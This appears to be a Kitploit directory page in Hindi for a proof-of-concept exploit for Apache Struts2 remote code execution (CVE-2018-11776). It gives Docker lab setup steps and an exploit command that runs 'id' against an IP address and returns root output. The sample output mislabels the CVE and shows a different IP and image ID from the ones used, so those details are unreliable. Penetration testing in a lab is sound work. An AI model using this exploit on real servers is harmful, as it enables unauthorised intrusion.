Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/freshdemo/apachestruts-cve-2018-11776
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubfreshdemo/apachestruts-cve-2018-11776

ApacheStruts-CVE-2018-11776

Apache Struts2 CVE-2018-11776 रिमोट कोड निष्पादन भेद्यता के लिए Python प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, प्रभावित संस्करणों 2.3-2.3.34 और 2.5-2.5.16 के विरुद्ध परीक्षण के लिए Docker कंटेनर के साथ।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
36 साल पहलेअभी तक समीक्षित नहीं

अपाचे स्ट्रट्स CVE-2018-11776 पायथन PoC

यह https://github.com/hook-s3c/CVE-2018-11776-Python-PoC पर आधारित है। कंटेनर बिल्ड और निर्देश README में बताए अनुसार काम नहीं कर रहे थे, इसलिए यह फोर्क बनाया गया। उपयोग किया गया POC शोषण Rapid7 से है।

शुक्रिया:

hook-s3c (github.com/hook-s3c), ट्विटर पर @hook_s3c
Rapid7 https://github.com/rapid7/metasploit-framework/issues/8064

परिचय

Semmle के मैन यू मो ने एक Struts2 RCE कमजोरी का खुलासा किया है, जो अनुरोध के URL पथ में एन्कोडेड पेलोड में पहुंचाई जाती है।

प्रभावित संस्करण 2.3 से 2.3.34, और 2.5 से 2.5.16 हैं।

डिफ़ॉल्ट कॉन्फ़िगरेशन असुरक्षित नहीं है। यह कंटेनर, और कई अन्य, असुरक्षित हैं।

चरण 1 - कंटेनर बनाएं

डॉकरफ़ाइल से कंटेनर बनाना बेहतर है जब आप देख सकते हैं कि बिल्ड में क्या जा रहा है।


git clone https://github.com/freshdemo/ApacheStruts-CVE-2018-11776 ./Struts
cd Struts
docker build . -t freshdemo/apachestruts

नया कंटेनर इस प्रकार खोजें


docker images

आउटपुट कुछ इस प्रकार होना चाहिए, जहाँ से आप इमेज ID प्राप्त कर सकते हैं।


root@kitploit:~
   root@DockerHost:~/ApacheStruts-CVE-2018-11776# docker images
REPOSITORY                                 TAG                 IMAGE ID            CREATED              SIZE 
freshdemo/apachestruts latest 6586cedf49fa About a minute ago 542MB

चरण 2 - कंटेनर चलाएं

निम्नलिखित के साथ एक कंटेनर बनाएं और प्रारंभ करें।


docker run -d --name apachestruts -p 8080:8080 d39018c50afe

चरण 3 - शोषण

सुनिश्चित करें कि कोई भी इनग्रेस/एग्रेस फ़ायरवॉल आपके द्वारा निर्दिष्ट पोर्ट (8080) की अनुमति देता है, और निम्नलिखित के साथ अपने लक्ष्य पर शोषण चलाएं।


python struts.py http://192.168.2.188:8080 'id'

आपका आउटपुट कुछ इस प्रकार होना चाहिए।


root@kitploit:~
root@k:/home/s# python struts.py http://192.168.2.188:8080 'id'
[*] CVE: 2017-5638 - Apache Struts2 S2-045
http://13.88.250.188:8080 : [*] cmd: id


uid=0(root) gid=0(root) groups=0(root) 

टूल डाउनलोड करें